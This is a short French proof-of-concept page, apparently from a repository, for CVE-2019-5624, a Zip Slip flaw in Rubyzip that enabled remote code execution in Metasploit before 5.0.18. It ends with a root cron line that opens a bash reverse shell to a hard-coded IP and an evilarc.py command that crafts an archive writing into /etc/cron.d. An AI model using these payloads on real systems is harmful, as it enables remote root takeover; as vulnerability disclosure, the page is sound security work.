
Une preuve de concept pour la vulnérabilité CVE-2019-5624 de Metasploit (exécution de code à distance via la gestion non sécurisée des ZIP dans Rubyzip)
Une preuve de concept pour la vulnérabilité CVE-2019-5624 de Metasploit (gestion insecure de ZIP par Rubyzip conduisant à une exécution de code à distance)
En février 2019, j'ai trouvé une nouvelle vulnérabilité dans la bibliothèque Rubyzip. Elle permet à un attaquant d'exploiter une gestion insecure de ZIP (Zip Slip) entraînant une exécution de commandes à distance.
Cette vulnérabilité a été exploitée pour cibler toutes les versions de Metasploit antérieures à 5.0.18 Metasploit Wrap-Up.
J'ai rédigé un article de blog détaillé expliquant la vulnérabilité.
* * * * * root /bin/bash -c "exec /bin/bash0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196"
python evilarc.py exploit --os unix -p etc/cron.d/